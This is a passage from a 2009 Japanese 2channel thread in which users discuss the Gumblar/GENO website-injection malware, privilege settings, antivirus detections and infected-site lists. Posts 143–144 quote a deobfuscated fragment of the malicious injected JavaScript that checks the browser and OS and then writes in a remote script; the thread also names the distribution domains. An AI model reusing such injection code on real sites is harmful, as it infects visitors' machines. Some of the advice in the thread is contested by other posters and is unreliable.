ようつべ、にこ動、やふー動画は、ちゃんとFlash Playerが 古いバージョンもしくは入っていません と警告してくれましたよ。 Googleは微妙、いきなりインスコしろ、言ってきた。 99 名前：192.168.0.774 mailto:sage [2009/05/24(日) 08:31:42 ID:oOp80I+s0] >>95 あらゆる可能性は、ある。ただし、そんな、今注目されてるところが感染したら、 だーれも気づかない(スレで誰も言及してない)ことなんてありえない。ってこと 100 名前：192.168.0.774 [2009/05/24(日) 08:56:50 ID:GCI88weB0] これホント？ >212　 ユキワリコザクラ(関東地方)　　[]　　2009/05/23(土) 22:39:52.90 ID:6wvDjucY >　 >XPユーザー、慌てるな >GENOってVistaの場合、UACが有効なら大丈夫 >であれば、XPの場合、常に非管理者権限で使用してれば感染しないぞ >パワーユーザーに権限を落とせ（必要時のみadminで運用） 　 101 名前：192.168.0.774 mailto:sage [2009/05/24(日) 09:10:20 ID:h/uTUbue0] >>100 思いっきりガセ 102 名前：192.168.0.774 mailto:sage [2009/05/24(日) 10:01:48 ID:O1GwBAYN0] >>100 ｢制限付きアカウントで使用｣ならホント 103 名前：192.168.0.774 mailto:sage [2009/05/24(日) 10:08:59 ID:oOp80I+s0 BE:2120544588-2BP(0)] 砂箱で実験したとき、Drivers32に書き込めないと失敗することがわかってる ここへの書き込みは、通常Administrators以上なので、たぶんそうなんだろう VMで実験した人の確定情報待ち 104 名前：192.168.0.774 mailto:sage [2009/05/24(日) 10:35:59 ID:O1GwBAYN0] VMじゃないが、実験用に仕立てた実機でmartuz.cn を試した。 汚染サイトに接続すると Temporary Internet Filesへ侵入→martuz.cn からの本体ダウンロード→ ダウンロードしたウィルスの実行 までは成功するが、レジストリの書き換えと%Root%以下のフォルダへの 書き込みに失敗するので、最終的な感染までは進行しなかった。 XP-SP3の制限付きアカウントでの実験な。 Power Userでは未テスト。防げないような気がするが。 制限アカウントで防いだ後は、キャッシュを消すのを忘れるなよｗ 105 名前：192.168.0.774 mailto:sage [2009/05/24(日) 11:07:07 ID:oOp80I+s0] よく考えたら、Power Users はXPHomeとかにはないので、やるならどのみちUsers以下か。 106 名前：192.168.0.774 mailto:sage [2009/05/24(日) 11:39:01 ID:yKvhjVD20] >>105 Power UsersはWindowsフォルダへの書き込みもできるし、セキュリティ面では あまり意味がないしね。 107 名前：192.168.0.774 mailto:sage [2009/05/24(日) 12:06:57 ID:hqpRrEcb0] XPhomeにpowerUserあるよ control userpasswords2からなら変えられる まぁ、>>106の言うとおりで意味ないけどな 108 名前：192.168.0.774 mailto:sage [2009/05/24(日) 12:14:57 ID:1zACvPr80] 力のあるユーザーか。 109 名前：192.168.0.774 mailto:sage [2009/05/24(日) 12:27:23 ID:tFlhttKu0] カスペのスキャンで悪意が存在するプログラムkeyloggerが検出されたんですが これはＧＥＮＯでしょうか。 110 名前：192.168.0.774 mailto:sage [2009/05/24(日) 12:28:13 ID:WEGukwsK0] それだけではカスペ使ってる人じゃないと分からないと思うので エスパーが来るまで待って下さい 111 名前：192.168.0.774 mailto:sage [2009/05/24(日) 12:31:32 ID:tFlhttKu0] >>110 レスありがとうございます。 待たせてもらいます。 112 名前：192.168.0.774 mailto:sage [2009/05/24(日) 12:49:40 ID:VjMCeEMy0] だめだこりゃ 113 名前：192.168.0.774 mailto:sage [2009/05/24(日) 13:32:18 ID:ufM6MerJ0] . 114 名前：192.168.0.774 mailto:sage [2009/05/24(日) 13:37:38 ID:h/uTUbue0] >>111 皮肉言われてるのに気付いてくれ。おとといきやがれといっしょ。 キーロガーというだけでは、GENOのスクリプトが落としてきたもののバリエーションの１つの可能性も 無関係のどこかで拾ってきたものの可能性もある。ゲーム等で、自前の内容にDinputを置き換えるような奴が、 キーロガーとして検知されることもあるし エスパーでなければ回答できない。誰も回答できないから諦めろ。 どうしても回答が欲しければ、カスペのスレで、検出名と検出されたファイル名、踏んだ心当たりを正確に 書いて質問すればいい。とにかくここでは、回答貰えません。出直しなさい。 >>112 (゜゜)(｡｡)うんうん 115 名前：192.168.0.774 mailto:sage [2009/05/24(日) 13:40:05 ID:tFlhttKu0] >>114 すみませんでした。 116 名前：192.168.0.774 mailto:sage [2009/05/24(日) 15:23:22 ID:2W8NCPrM0] 誘導 【Anti Virus】Kaspersky Lab Part83【ｶｽﾍﾟﾙｽｷｰ】 pc11.2ch.net/test/read.cgi/sec/1240735790/ 117 名前：192.168.0.774 mailto:sage [2009/05/24(日) 15:25:36 ID:74FjqYRv0] >>114 優しいですね 118 名前：192.168.0.774 [2009/05/24(日) 18:18:32 ID:SX0zJqf70] Meだから安心 119 名前：192.168.0.774 mailto:sage [2009/05/24(日) 18:31:56 ID:l6NMT+y60] ごしゅじんさまにあえて、えむいはしあわs… 120 名前：192.168.0.774 mailto:sage [2009/05/24(日) 19:46:13 ID:CuuFY58N0] やめろおおおお 121 名前：192.168.0.774 [2009/05/24(日) 19:48:55 ID:INl1BLTo0] やめて涙出るからやめて Me使ったことないけど泣けるからｗ 122 名前：192.168.0.774 mailto:sage [2009/05/24(日) 20:32:50 ID:DbyLrNnz0] Meたん使いの俺号泣 123 名前：192.168.0.774 mailto:sage [2009/05/24(日) 21:27:10 ID:gNsaRzby0] 時代が進めばそのうち ごしゅじんさまにあえて、えっくすぴーはしあわs… になる時が来るのか 124 名前：192.168.0.774 mailto:sage [2009/05/24(日) 21:29:55 ID:oOp80I+s0] たぶん、【32bit】まだまだXPを使い続けるスレ 13GB【CD-ROM】とかいうスレが立ってるｗ 125 名前：192.168.0.774 mailto:sage [2009/05/24(日) 21:50:40 ID:knIrnezr0] このスレも低レベル化してきたか… 情報提供とかする必要ないよね…こんな民度なら。 126 名前：192.168.0.774 mailto:sage [2009/05/24(日) 21:55:18 ID:lzXlDT8y0] >>125 ま、本当に情報提供できる奴なら言い訳じみた愚痴よりも情報が先に出るもんだがな 127 名前：192.168.0.774 mailto:sage [2009/05/24(日) 22:04:44 ID:kwJlcu/p0] わー125は高レベルでとんでもなく民度が高いんですねーすごいなー なんで２ちゃんのスレなんかに書き込みしてるのー？ うつっちゃうよ？ｗ 128 名前：192.168.0.774 mailto:sage [2009/05/24(日) 22:17:35 ID:knIrnezr0] 今までVMでの感染確認とか検体提供とかやってきたけど、うつっちゃうらしいからやめます で、もうここにも来ませんので安心して書き込み続けてください 129 名前：192.168.0.774 mailto:sage [2009/05/24(日) 22:19:28 ID:zG/5ojVF0] セキュ板帰ろうぜ 130 名前：192.168.0.774 mailto:sage [2009/05/24(日) 22:24:30 ID:oOp80I+s0] >>128 皮肉を込めたつもりだろうが、ま、踏むスレで会おう 131 名前：192.168.0.774 mailto:sage [2009/05/24(日) 22:44:06 ID:YgJDyVRl0] レベルと民度がうつっちゃう言われてんのに聞かないから… 132 名前：192.168.0.774 mailto:sage [2009/05/24(日) 22:53:05 ID:heAsx668P] 最近、沈静化して来た？ 133 名前：192.168.0.774 mailto:sage [2009/05/24(日) 22:59:56 ID:inQC6pkk0] >>132 ウイルスバスターが機能してないから検出すらできなくてってパターンで３件ほど身近にあったから 表に出ないだけでかなり伝播してるはず 134 名前：192.168.0.774 [2009/05/24(日) 23:04:14 ID:aJuP8TRJ0] 高レベルな人向けのスレって別にできたんじゃなかったの。 大事な情報は、そっちに上げたほうがいいと思う。 ここは、一般向けの情報で十分なのでは？ 135 名前：192.168.0.774 mailto:sage [2009/05/24(日) 23:16:40 ID:nMp8odr00] すっごくむかついたんだろうなあｗ 分かるよその気持ちｗ 136 名前：192.168.0.774 mailto:sage [2009/05/25(月) 00:53:49 ID:kdtDbFTU0] >>132 本体配布サイトが止まってるからね。 137 名前：192.168.0.774 mailto:sage [2009/05/25(月) 02:34:31 ID:Not8R34U0] >>134、やっぱ間違い。ウイルス飼って実験してるような人の情報は、 ここに上げてもらえれば、別スレの人も見てるだろうし、必要なら 誘導してくれるってことかな？　そう自分が思ってるだけだけども。 138 名前：192.168.0.774 mailto:sage [2009/05/25(月) 02:48:16 ID:29sMFtyK0] >>137 >>126 だから心配しなくてもいいよ 139 名前：192.168.0.774 mailto:sage [2009/05/25(月) 03:03:15 ID:Not8R34U0] あっ、はい。そうだとは思いましたが、ほかにも情報提供に来る人がいて、 レス読んで帰っちゃうといけないと思って。差し出がましいことをしました。 140 名前：192.168.0.774 mailto:sage [2009/05/25(月) 03:52:16 ID:g0EArU8a0] まだ出てない情報って何がある？ C&C鯖がウクライナとイギリスにあってまだ生きてる とか使用も無い情報しか知らないんだけど 141 名前：192.168.0.774 mailto:sage [2009/05/25(月) 09:30:19 ID:orpiBNMg0] 最新の情報じゃないかもしれないけど感染したサイトのJSってIEじゃないとifで弾かれるよね？つまりIEじゃなきゃ感染しないよね？ 142 名前：192.168.0.774 mailto:sage [2009/05/25(月) 09:52:49 ID:OIu3WwGb0] あれ、chrome以外はみんな対象じゃなかったっけ 143 名前：192.168.0.774 mailto:sage [2009/05/25(月) 09:57:19 ID:OIu3WwGb0] うん、やっぱりIEも火狐もOperaもSafariも感染対象 takeshima.2ch.net/test/read.cgi/news4vip/1242637188/503 503 名前：以下、名無しにかわりましてVIPがお送りします：2009/05/18(月) 20:50:57.57 ID:PuSZbVxyP コード展開して見てみたら、最後に読み込ませるかどうかの部分にこんな処理が if( (u.indexOf("Chrome")<0)//Google Chromeでなく && (u.indexOf("Win")>0)//かつWindowsで && (u.indexOf("NT 6")<0)//なおかつWindows 6=Vistaでなく && (document.cookie.indexOf("miek=1")<0)//かつ踏んで感染したときにつけられるデータがなく（＝踏むのがはじめてで） && (typeof(zrvzts)!=typeof("A"))//かつリロードしてない、初めての読み込みであるとき ){ DLさせる処理 } 144 名前：192.168.0.774 mailto:sage [2009/05/25(月) 10:05:54 ID:9na8SiBQ0] 続きがあるんだよ > if(window.ScriptEngine) j=j+ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion()+j; > document.write("<script src=//****"+"**.**/vid/?id="+j+"><\/script>"); Safari/Winで踏むと、?id= のうしろが最終的にブランクになる このGETに対して何か鯖側が準備してたかってことになるわけ してたかもしれんし、してなかったかもしれん 145 名前：192.168.0.774 mailto:sage [2009/05/25(月) 10:07:49 ID:xQ23/q8u0] 1.js(>>143) 2.id=100 or id=101(ie not ie (script)) 3.id=2 and id=3(pdf and flash) 4.id=10(exe) 5.ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html 146 名前：192.168.0.774 mailto:sage [2009/05/25(月) 11:25:57 ID:l1RBWHbr0] いまさら何言ってんだか IEでなくても普通にpdf/swf落ちてきてたから 147 名前：192.168.0.774 mailto:sage [2009/05/25(月) 12:18:46 ID:zMoesA260] zlkonでは無指定でも落ちてきた martuzでは指定パターンによって落ちてこなくなった gunblarがどっちだったかは知らん 148 名前：192.168.0.774 mailto:sage [2009/05/25(月) 12:31:02 ID:tQ4f0t5i0] >>98 そうじゃなくて、 Shockwave FlashとFlash PlayaerそれぞれにFirefoxとか用のPlugin版とIE専用のActiveX版があるの。 だから、4種類全部がインストールされている人もいるわけ。 149 名前：192.168.0.774 mailto:sage [2009/05/25(月) 15:08:58 ID:L01Nn5aV0] パソコン初心者板の｢初心者スレッド｣っていうの開いたら ノートン先生が怒ったんですがウィルスですか？ リンク踏んだわけじゃなくてスレ開いただけなんですが 150 名前：192.168.0.774 mailto:sage [2009/05/25(月) 15:10:33 ID:/uV5OlPd0] なぜそれをここで聞く？ 151 名前：192.168.0.774 mailto:sage [2009/05/25(月) 15:15:44 ID:L01Nn5aV0] ２ちゃんスレも危ないのかと思ったんです、すみません 152 名前：192.168.0.774 mailto:sage [2009/05/25(月) 15:21:34 ID:/uV5OlPd0] じゃあここも2ちゃんだから危ないね 他のところで聞くなり調べるなりしたほうがいいよ 153 名前：192.168.0.774 mailto:sage [2009/05/25(月) 15:28:05 ID:L01Nn5aV0] 初心者板でなければどこで・・ ノートン誤作動で聞けばいいでしょうか 154 名前：192.168.0.774 mailto:sage [2009/05/25(月) 15:33:24 ID:b26zynpUP] 海外もサイトも感染してるな 155 名前：192.168.0.774 mailto:sage [2009/05/25(月) 15:35:05 ID:xQ23/q8u0] 海外も3月末から感染しまくってますが、どうかされましたか 156 名前：192.168.0.774 mailto:sage [2009/05/25(月) 15:35:17 ID:xwO8FSQb0] そりゃ、海外から来たウイルスだからな 157 名前：192.168.0.774 mailto:sage [2009/05/25(月) 16:03:57 ID:9na8SiBQ0] スレ違いにあたるのでヒントだけ 2ちゃんねる ノートン でぐぐる。対策はなにげに面倒だったりするが、まずはなにごとか知ること 158 名前：192.168.0.774 mailto:sage [2009/05/25(月) 16:44:23 ID:g0EArU8a0] SafariなんぞWin98と同じで眼中に無かっただけだろ 159 名前：192.168.0.774 mailto:sage [2009/05/25(月) 17:29:01 ID:kdtDbFTU0] ノートントラップのことは初心者スレで聞けよ 160 名前：192.168.0.774 [2009/05/25(月) 17:38:15 ID:YvB3PQLE0] リストって情報古いまま？ pixivが一部感染になってるけどこれは… 161 名前：192.168.0.774 mailto:sage [2009/05/25(月) 17:55:54 ID:d34ru99R0] あのリストとチェックサイトの件は無かったことにしたほうがいいよ 今となってはかえって混乱を増幅してる 162 名前：192.168.0.774 [2009/05/25(月) 19:48:26 ID:d84pSB9l0] >>160 pixiv のプロフィールページで自分のＨＰやブログにリンクを貼ってる人がある程度いる。 そのなかで感染してるページがあったという噂に基づく．．．．らしい。 163 名前：192.168.0.774 mailto:sage [2009/05/25(月) 21:41:49 ID:JhdhMmYC0] GENOの所が、またやらかしたらしい・・・ 378 名前：Socket774 投稿日：2009/05/25(月) 14:40:04 ID:Xd8gaLc7 GENOでポイント照会すると、他人のIDが出て来ちゃう(>_<) 380 名前：Socket774 投稿日：2009/05/25(月) 15:15:22 ID:b7/1msFI >>378は、他人のID使ったなりすまし犯罪者ですね、わかります。 381 名前：378 投稿日：2009/05/25(月) 15:25:46 ID:Xd8gaLc7 >>380 なりすましじゃないよ。 注文照会したら、「注文された商品はありません」ってなってたから、 おかしいって思って、ポイント照会したら、他人のIDがでてきた。 で、会員情報の修正って所をクリックしたら…。 382 名前：Socket774 投稿日：2009/05/25(月) 15:33:03 ID:b7/1msFI ほんとだ。ログインし直しても、他人の名前とIDとポイント獲得歴が出てしまい、 自分の情報が閲覧できないぞ。 383 名前：378 投稿日：2009/05/25(月) 15:34:19 ID:Xd8gaLc7 >>382 だろ。 自分の個人情報も変えれねーwww 164 名前：192.168.0.774 mailto:sage [2009/05/25(月) 21:54:51 ID:+y9+ZUOu0] さすがGENOさん！俺たちに（以下ｒｙ つか、こんな騒動があっても利用する奴が居る事に驚いた。 165 名前：192.168.0.774 mailto:sage [2009/05/25(月) 22:08:06 ID:jKyVT4Df0] 7つのNOだな 166 名前：192.168.0.774 mailto:sage [2009/05/25(月) 22:14:53 ID:2+gm0oNq0] 何やってんだGENOは･･･ 167 名前：192.168.0.774 mailto:sage [2009/05/25(月) 22:31:48 ID:73AdRoBk0] オレも他人のＩＤで出たぞ アカ削除することもできねぇ 168 名前：192.168.0.774 mailto:sage [2009/05/25(月) 22:39:30 ID:ju8jdLa20] 別種のウィルスに感染してたりしてな ログインした人も軒並み感染とか・・・ だとしたら新GENOウィルスって名前になるのかなｗ 169 名前：192.168.0.774 mailto:sage [2009/05/25(月) 22:47:26 ID:1LBKGrg40] 他人のIDとごっちゃとか半端ねぇｗｗ 170 名前：192.168.0.774 mailto:sage [2009/05/25(月) 22:50:18 ID:c0a0QXT00] GENO第二章の始まりか？ それにしても他人の名前やらIDやらが出るってひでーな 171 名前：192.168.0.774 mailto:sage [2009/05/25(月) 22:57:50 ID:R7WqhNJI0] これが別のウイルスのせいだったらGENOウイルスIIとかハイパーGENOウイルスとか そんな名前にするの？ 172 名前：192.168.0.774 mailto:sage [2009/05/25(月) 23:00:27 ID:2XNmNZPd0] 今回の問題に関するGENOの回答も期待できるのかなw 管理者がバカやらかした可能性もまたウイルスな可能性もあそこならありえる 173 名前：192.168.0.774 mailto:sage [2009/05/25(月) 23:03:51 ID:/SYvB9LI0] 改ざんサイトをGoogleで簡単に発見可能なことが判ったのでメモ。 1. 任意のドメインをGoogleのセーフ ブラウジングで検索する。 例えば「google.com」なら、safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=google.com をブラウザで開く。 2. 表示された「Google セーフ ブラウジング診断ページ」で、 「This site was hosted on xx network(s) including」の後にあるリンク（上の場合、「AS15169 (GOOGLE)」）をクリック。 3. そのネットワーク内でホスティングされている改ざんサイトのURLが挙げられるので、リンクをクリック。 4. 「不正なソフトウェアは gumblar.cn/ を含む 1 個のドメインでホストされています。」といった文章があれば、gumblarスクリプトに改ざんされた可能性あり。 174 名前：192.168.0.774 mailto:sage [2009/05/25(月) 23:04:38 ID:/SYvB9LI0] これをドメイン名を変えて総当たりでひたすら続けると、ぞろぞろ出てきます。 ちなみに検索するドメイン名は、「google.com」と「www.google.com」とでは検索結果が違うので注意。 「www.」なしで検索して「疑わしくない」という結果が出ても、「www.」などを付けると「疑わしいサイト」になったりします。 175 名前：192.168.0.774 mailto:sage [2009/05/26(火) 03:39:47 ID:adE8bcIF0] >>174 お前にﾊﾟｿｺﾝ通信は無理 176 名前：192.168.0.774 [2009/05/26(火) 03:46:27 ID:/VVIOLJQ0] ﾊﾟｿｺﾝ通信ﾜﾛﾀｗｗ 177 名前：192.168.0.774 mailto:sage [2009/05/26(火) 04:22:39 ID:opExhozI0] パソ通の時代なんて知らんけどまずはニフティマネージャを(ry 178 名前：192.168.0.774 mailto:sage [2009/05/26(火) 04:29:44 ID:0NS4XGEC0] 新しいウィルスだったらNEOGEOウィルスで 179 名前：192.168.0.774 mailto:sage [2009/05/26(火) 04:30:08 ID:/ktv3JuM0] このウイルスって感染すると専ブラの調子もおかしくなるのかな… 180 名前：192.168.0.774 mailto:sage [2009/05/26(火) 04:45:10 ID:mifzxisU0] >>179 よほどのマシンパワーがないと全てがまともに動かん 181 名前：192.168.0.774 mailto:sage [2009/05/26(火) 04:48:59 ID:mifzxisU0] とか言ったけど上はVM上の話な 普通気がつくレベルと思うけど 182 名前：192.168.0.774 mailto:sage [2009/05/26(火) 04:53:06 ID:/ktv3JuM0] そっか…ありがとう chmファイルは異常ないみたいなんだけども 何故かいくつかのスレが表示がおかしくなるんだけどそっちは別の原因があるのか 183 名前：192.168.0.774 mailto:sage [2009/05/26(火) 08:57:00 ID:xUEn5PcS0] >>182 別件や別ウイルスでレジストリ狂ってんじゃね？ クリーンインスコやろうぜクリーンインスコ 慣れたら快感になるからやろうぜ 184 名前：192.168.0.774 mailto:sage [2009/05/26(火) 09:40:42 ID:NRkVzeKAO] >>183は踏みすぎｗｗｗ 185 名前：192.168.0.774 mailto:sage [2009/05/26(火) 10:50:49 ID:ti9+LTirO] 快感になるワロタ だが分からんでもない 186 名前：192.168.0.774 mailto:sage [2009/05/26(火) 11:32:19 ID:Z2FeIoNLP] WindowsもLinuxみたいにバッチファイルひとつで、 クリーンインストール後の設定とアプリインストールとアップデートがワンタッチでできればいいのにね。 ドライバ、アップデート、必要なアプリインストールとか環境整えるのが面倒すぎる。 187 名前：192.168.0.774 mailto:sage [2009/05/26(火) 11:57:33 ID:Au+8+Nsd0] Windows 7でそういう機能を搭載するのかと思ったけど違うみたいだしね 188 名前：192.168.0.774 mailto:sage [2009/05/26(火) 11:57:48 ID:MO01MAyz0] 企業向けには避けて通れない機能で、msbatch.inf とかAIK とかあるわけだが、 そのスクリプトを書くのがけっこう面倒だったりする 再インスコしたら、切る(start=demand も含む)サービスの一覧だけは、 毎度面倒なわりに、バッチを書くのが簡単なので、バッチにしておいてある あとは砂箱か 189 名前：192.168.0.774 mailto:sage [2009/05/26(火) 11:58:26 ID:R/KlVnzg0] >>182 ノートントラップみたいにAvastトラップがあるからなｗ 190 名前：192.168.0.774 mailto:sage [2009/05/26(火) 12:04:04 ID:Au+8+Nsd0] >>188 ありがとう 191 名前：192.168.0.774 mailto:sage [2009/05/26(火) 12:16:02 ID:ZHtkN1G7O] ブログの、記事じゃなくてコメントを開いてから、パソコンの調子がおかしくなったんだけど 普通コメントに書き込んでウイルス撒くなんてのは出来ないですよね？ ウイルスとは関係ないのかな… 192 名前：192.168.0.774 mailto:sage [2009/05/26(火) 12:31:27 ID:l/mq9I5TP] >>191 そのページに悪意あるスクリプトがあるかどうかで決まる >>2をみて確認しとけ 193 名前：192.168.0.774 mailto:sage [2009/05/26(火) 13:30:59 ID:0mP/syHF0] 感染サイトリストの紹介文のところのURL、なんで踏めるようにしちゃったんだろう 194 名前：192.168.0.774 mailto:sage [2009/05/26(火) 13:43:09 ID:IhQBcdl+0] >>189 avast!だが別におかしくならないぞ？ 195 名前：192.168.0.774 mailto:sage [2009/05/26(火) 14:02:41 ID:bEUyE4rkP] >>179 俺はavast使い始めた時にちょっとおかしくなった 具体的には明らかに>>200までしか進んでないのに、>>800宛のレスが当然のように(しかも複数)使われてたり。 まぁスレにウィルスのコードか何かが張られてて、それを察知したavastたんがスレの大部分を隔離してただけだったんだが。 196 名前：192.168.0.774 mailto:sage [2009/05/26(火) 14:05:44 ID:g4Ut+ZKA0] datぶっ壊れたらそうなるよ 197 名前：191 mailto:sage [2009/05/26(火) 14:35:00 ID:ZHtkN1G7O] >>192 ありがとうございます！ 今確認してみたら、そのファイルも50,727バイトだったし、レジストリエディタも立ち上がった… よかった！ ただ、IEが妙に終了したりするようになったのが気になるな… 198 名前：192.168.0.774 mailto:sage [2009/05/26(火) 15:27:40 ID:76kSxz87P] 最近「IPアドレス取得中」と表示されます 環境は,XPSP3 YBB12Mで無線ＬＡＮ接続しています ここ最近、起動時にネットには接続できるのですが アイコンが「IPアドレス取得中」の状態なんです 修復すると正常のアイコンに戻ります。 このウィルスに感染したんでしょうかね？ 199 名前：192.168.0.774 mailto:sage [2009/05/26(火) 15:32:25 ID:3uBHEXNZO] >>198 >>1 200 名前：192.168.0.774 mailto:sage [2009/05/26(火) 15:32:58 ID:/ktv3JuM0] >>183 クリーンインスコか…最終手段はそうしてみる avastは入れてないんだけどなんか開けないスレがいくつかあるんだよな とりあえずdatを消してみてまた取得しなおしてみる 201 名前：192.168.0.774 mailto:sage [2009/05/26(火) 15:33:05 ID:Z2FeIoNLP] なんでもかんでもGENOのせいｗ 202 名前：192.168.0.774 mailto:sage [2009/05/26(火) 15:36:26 ID:76kSxz87P] >199 >1は読んで対応済みです 203 名前：192.168.0.774 mailto:sage [2009/05/26(火) 15:38:45 ID:whX8t5/V0] >>198 >>183 204 名前：192.168.0.774 mailto:sage [2009/05/26(火) 15:49:07 ID:l/mq9I5TP] >>198 ・・・さすがに酷い、わざわざ質問する前にテンプレみて確認しろよ つーか、GENOかどうか疑う前に IPアドレス取得中 でggrks 205 名前：192.168.0.774 mailto:sage [2009/05/26(火) 16:32:20 ID:AzhiVy6U0] >>197 Genoではないものの他のウイルスに感染している 可能性もあるのでニフティなどでスキャンをしてみてください 206 名前：192.168.0.774 mailto:sage [2009/05/26(火) 16:56:24 ID:3uBHEXNZO] >>202 1は読んだんですね、すみません それならもうネットに繋がない方がいいですよ 207 名前：192.168.0.774 mailto:sage [2009/05/26(火) 17:05:14 ID:xUEn5PcS0] つかこれ釣りじゃね？ 208 名前：192.168.0.774 mailto:sage [2009/05/26(火) 18:35:15 ID:R/KlVnzg0] >>198 お前の環境が悪いだけ。有線で繋いどけ。 209 名前：192.168.0.774 mailto:sage [2009/05/26(火) 20:16:30 ID:jrdNXPLC0] 前スレ？かな、次はQuickTimeとか狙われるかも みたいなレスがあったと思ったけど こんなことになったぜ・・・ www.forest.impress.co.jp/article/2009/05/26/quicktimevulner.html 210 名前：192.168.0.774 mailto:sage [2009/05/26(火) 21:50:53 ID:MO01MAyz0] このネタ既出？ｗ www.geocities｡jp/bjpinoko20/hgkouza.htm gumbler へのリンクが埋め込まれているはずですが…。 > /./g 211 名前：192.168.0.774 mailto:sage [2009/05/26(火) 22:15:34 ID:2djNJEe50] firefoxだとsafebrowsingに怒られちゃうな 212 名前：192.168.0.774 mailto:sage [2009/05/26(火) 22:51:29 ID:q+URMcwD0] GenoVirus感染サイトリストのコメントのURLがリンクになってるんだけどいつからだろ？ これ間違って踏む人出そうで危ないような気がするんだが…。 213 名前：192.168.0.774 mailto:sage [2009/05/26(火) 22:54:43 ID:zO7o4gpQ0] 間違って踏む人なんかいるか？ それより、駆除できてるのに、いつまでもリストアップされてるサイトが気の毒。 214 名前：192.168.0.774 mailto:sage [2009/05/26(火) 23:53:25 ID:7dDKXeJO0] 駆除しても告知しなきゃ意味ないだろ 気の毒も何もあったもんじゃない これじゃ元々感染してないのか駆除済みなのかわからん 215 名前：192.168.0.774 mailto:sage [2009/05/27(水) 00:22:48 ID:Q9qE4kHO0] それはうｐ主に言ってるの？ 感染サイトに言ってるの？ 216 名前：192.168.0.774 mailto:sage [2009/05/27(水) 00:26:07 ID:Zw9diHMU0] サイトとかページに対して「感染」とか「駆除」とか言うと あたかもウイルスの実体がサイト自体、ページ自体にあるかのように 誤解する人が出る 217 名前：192.168.0.774 mailto:sage [2009/05/27(水) 00:44:02 ID:DS7RW+Eb0] 感染サイト、今リロッたらたらリンクなしになってた ところでpass入れても記事削除できないんだが自分だけか？ 同じ記事を２重に書いてしまい、ひとつは消せたから、pass間違いはないはず。 同じ不具合？があるなら、 上げた人が誤報告や対策済みと確認したところで、修正できないわけだが… 218 名前：192.168.0.774 mailto:sage [2009/05/27(水) 00:45:32 ID:Q9qE4kHO0] あー、それはあるかもな。 厳密には「管理者のPCがトロイの木馬型ウイルスに感染したために不正に改竄されたサイトリスト」・・・・・・て長いよっ。 219 名前：192.168.0.774 mailto:sage [2009/05/27(水) 00:56:26 ID:SmAh1nJS0] なんか次はQuickTimeの脆弱性が突かれそうだな。 毎度のごとくパッチが用意される前にアドバイザリが公開され、 ゼロデイ状態になってるから、Adobeよりも狙い目なんじゃ ないか？ 220 名前：192.168.0.774 mailto:sage [2009/05/27(水) 02:57:28 ID:NCsP4Es70] >>216 ってか途中までそう思ってた。 そしてQuickTime入れてない俺は勝ち組。 221 名前：192.168.0.774 mailto:sage [2009/05/27(水) 05:42:48 ID:aSvBKq6i0] うっしゃ自分もいれてない。 あれ、ことあるごとにインスコされようとするからウザいんだよなぁ 222 名前：192.168.0.774 mailto:sage [2009/05/27(水) 10:38:07 ID:mqE4guJk0] XSS対策されてないblogとかのwebサービスは、 投稿者がスクリプト投稿したら閲覧者が感染するよ 今はmartuz止まってるみたいだから、martuz以外から実体拾うようにしないと無理だけど。 223 名前：sage [2009/05/27(水) 11:07:25 ID:+948GCw/0] >>148、すみません。全然、理解していませんでした。こうでしょうか？ Firefox用プラグイン Shockwave Flash―――――――Flash Player 　　　　　　　　　　Shockwave for Director―――-Shockwave Player IE用 ActiveX Shockwave Flash Object―――-Flash Player 　　　　　　　　　　Shockwave ActiveX Control――Shockwave Player でも、自分は、まだFlashとShockwaveの違いも よく分かってませんが、 ほんと難しいなと思いました。 Macromedia社やDirectorなどの成り立ちから、通常 呼び分けていた流れと、 機能面からか、それぞれ製作側、閲覧側のツールとして捉える向きと Web上に混在していて、時系列を把握していないと、一概には咀嚼できないんですね。 この認識も、ものすごく浅いところでは、という注釈つきでもダメかもしれませんし……。 とにかく自分は Flashの歴史について無知すぎた。 アドオン、プラグイン、ActiveXコントロールなどの 拡張パックの語彙・用法に関してもAboutすぎました。 224 名前：192.168.0.774 mailto:sage [2009/05/27(水) 11:15:10 ID:H/k8FWrU0] >>219 QuickTimeに限らず、昔からApple製のソフトは極め付けに行儀が悪く、 汚れた手で全身を撫で回されるような気持ち悪さがあるから常識のある奴は使わない。 感染するのはiPhoneやiPodみたいなアイテムを使ってる変態共だけだろ。 225 名前：192.168.0.774 mailto:sage [2009/05/27(水) 11:41:56 ID:cNx9FNpE0] >>223 日本語でおｋ 226 名前：192.168.0.774 mailto:sage [2009/05/27(水) 11:42:07 ID:Lh6wq4Ey0] 確かに入れてるだけでしぶとくしつこくスタートアップに居座ろうとするQuickTimeは、難儀な存在だな。 iTunesとがんじがらめにしてるところもあざとい。 227 名前：192.168.0.774 mailto:sage [2009/05/27(水) 11:54:47 ID:5HmcqpnuP] iTunesとかQuickTimeはMACで使うもの。Windowosには入れてない。 228 名前：192.168.0.774 mailto:sage [2009/05/27(水) 11:59:32 ID:zItNA/Lv0] amazon危険度92%って微妙すぎて怖い 229 名前：192.168.0.774 mailto:sage [2009/05/27(水) 12:02:47 ID:dxmZredg0] 携帯用に変換するためだけに入れてるけど、そんなに行儀悪いのか？ 年に数回しかつかわないし、iPodは持ってない･･･ 230 名前：192.168.0.774 mailto:sage [2009/05/27(水) 12:11:01 ID:KFsQLuii0] 俺はゆるいあぽー信者だが、環境維持という観点では、 耐えられないって意見が出てくるのもしゃーない挙動はちょくちょくあるね 最近では、勝手にSafariダウソとか 信者から見てもありゃやりすぎだｗ 例によって、砂箱にほうり込んでおけばおｋ 231 名前：192.168.0.774 mailto:sage [2009/05/27(水) 12:32:52 ID:tYvKSspx0] >>229 俺も変換君のためだけに入れてる 232 名前：192.168.0.774 mailto:sage [2009/05/27(水) 12:52:51 ID:0KD43PY10] >>224 常識のある奴って・・・ｗｗｗ ああ、そうか、常識のある奴は>>224のような書き込みをするのか・・・ 233 名前：192.168.0.774 mailto:sage [2009/05/27(水) 13:29:48 ID:aSvBKq6i0] これ思い出した。 iTunesが　おきあがり なかまに　なりたそうに　こちらをみている！ なまかに　してあげますか？ >はい iTunesが　なかまに　くわわった！ QuickTimeが　なかまに　くわわった！ Bonjour for Windowsが　なかまに　くわわった！ 234 名前：192.168.0.774 mailto:sage [2009/05/27(水) 13:36:09 ID:6IjdJuck0] >>229 そういやQuicktimeってFirefoxを勝手に設定書き換えたり 